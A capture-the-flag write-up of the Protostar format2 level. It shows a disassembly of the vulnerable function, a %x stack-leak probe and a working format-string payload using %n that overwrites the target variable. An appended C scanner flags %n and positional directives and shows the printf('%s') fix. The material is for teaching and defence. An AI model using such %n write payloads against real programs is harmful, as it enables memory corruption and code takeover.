user@protostar:/opt/protostar/bin$ perl -e 'print "AAAA", "%x_"x4' | ./format2
AAAA200_b7fd8420_bffff624_41414141_target is 0 :(
(gdb) disas vuln
Dump of assembler code for function vuln:
0x08048454 <vuln+0>: push ebp
0x08048455 <vuln+1>: mov ebp,esp
0x08048457 <vuln+3>: sub esp,0x218
0x0804845d <vuln+9>: mov eax,ds:0x80496d8
0x08048462 <vuln+14>: mov DWORD PTR [esp+0x8],eax //val
0x08048466 <vuln+18>: mov DWORD PTR [esp+0x4],0x200 //0x200
0x0804846e <vuln+26>: lea eax,[ebp-0x208]
0x08048474 <vuln+32>: mov DWORD PTR [esp],eax //fp(string)
0x08048477 <vuln+35>: call 0x804835c <fgets@plt>
fgets(buffer, 0x200, stdin);
(gdb) x/10x $esp
0xbffff560: 0xbffff570 0x00000200 0xb7fd8420 0xbffff5b4
0xbffff570: 0x41414141 0x41414141 0x41414141 0x41414141
0x0804847c <vuln+40>: lea eax,[ebp-0x208]
0x08048482 <vuln+46>: mov DWORD PTR [esp],eax
0x08048485 <vuln+49>: call 0x804837c <printf@plt>
//prints the user-supplied buffer as-is (format string bug!)
0x0804848a <vuln+54>: mov eax,ds:0x80496e4 //target
0x0804848f <vuln+59>: cmp eax,0x40
0x08048492 <vuln+62>: jne 0x80484a2 <vuln+78> //if(target != 0x40){ jmp 78 }
0x08048494 <vuln+64>: mov DWORD PTR [esp],0x8048590
0x0804849b <vuln+71>: call 0x804838c <puts@plt> //you have modified the target :)
0x080484a0 <vuln+76>: jmp 0x80484b9 <vuln+101>
0x080484a2 <vuln+78>: mov edx,DWORD PTR ds:0x80496e4 //target
0x080484a8 <vuln+84>: mov eax,0x80485b0
0x080484ad <vuln+89>: mov DWORD PTR [esp+0x4],edx
0x080484b1 <vuln+93>: mov DWORD PTR [esp],eax
0x080484b4 <vuln+96>: call 0x804837c <printf@plt> //target is %d :(
0x080484b9 <vuln+101>: leave
0x080484ba <vuln+102>: ret
End of assembler dump.
This one just changes the value to 0x40. Solve it like format1, but make the length 0x40.
user@protostar:/opt/protostar/bin$ python -c 'print "\xe4\x96\x04\x08%60d%4$n"' | ./format2
. 512
you have modified the target :)
It didn't work with Perl, so I did it with Python ㅠㅠ sob
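Added defender-side example (my code, not from the write-up or from Protostar): a scanner that parses untrusted input with printf's conversion grammar and flags the %n and positional directives this level relies on, next to the one-line fix for vuln(). The sample strings are the two inputs used above plus one constructed benign line.

```c
#include <stdio.h>
#include <string.h>

/* What a printf-style parse of one untrusted string found ("%%" is not counted). */
struct fmt_scan { int directives, positional, writes; };  /* writes = %n conversions */

/* Parses s with printf's conversion grammar: '%', optional N$, flags, width,
 * .precision, length modifier, conversion letter. Text is harmless as a format
 * only if writes == 0 and positional == 0; ordinary user input never needs either. */
struct fmt_scan scan_format(const char *s)
{
    struct fmt_scan r = {0, 0, 0};
    while (*s) {
        if (*s++ != '%') continue;
        if (*s == '%') { s++; continue; }                 /* literal percent sign */
        const char *p = s;
        while (*p >= '0' && *p <= '9') p++;               /* width, or the N of N$ */
        if (*p == '$') { r.positional++; p++; }
        while (*p && strchr("-+ #0*", *p)) p++;           /* flags, '*' width */
        while (*p >= '0' && *p <= '9') p++;               /* width */
        if (*p == '.') { p++; while ((*p >= '0' && *p <= '9') || *p == '*') p++; }
        while (*p && strchr("hlLqjzt", *p)) p++;          /* length modifiers */
        if (!*p) break;                                   /* conversion cut off by end of input */
        r.directives++;
        if (*p == 'n') r.writes++;                        /* %n stores to memory */
        s = p + 1;
    }
    return r;
}

/* Detection gate for an input filter or log check: nonzero if the string would
 * write memory or select arguments by index were it ever used as a format. */
int looks_like_format_attack(const char *s)
{
    struct fmt_scan r = scan_format(s);
    return r.writes > 0 || r.positional > 0;
}

/* The fix for vuln(): user bytes are data, passed through a fixed format. */
void echo_line(const char *line) { printf("%s", line); }
int main(void)
{
    /* Constructed samples: the two inputs used on this level plus a benign line. */
    const char *samples[] = { "AAAA%x_%x_%x_%x_", "\xe4\x96\x04\x08%60d%4$n", "100%% done" };
    for (int i = 0; i < 3; i++) {
        struct fmt_scan r = scan_format(samples[i]);
        printf("directives=%d positional=%d writes=%d flagged=%d\n",
               r.directives, r.positional, r.writes, looks_like_format_attack(samples[i]));
    }
}
```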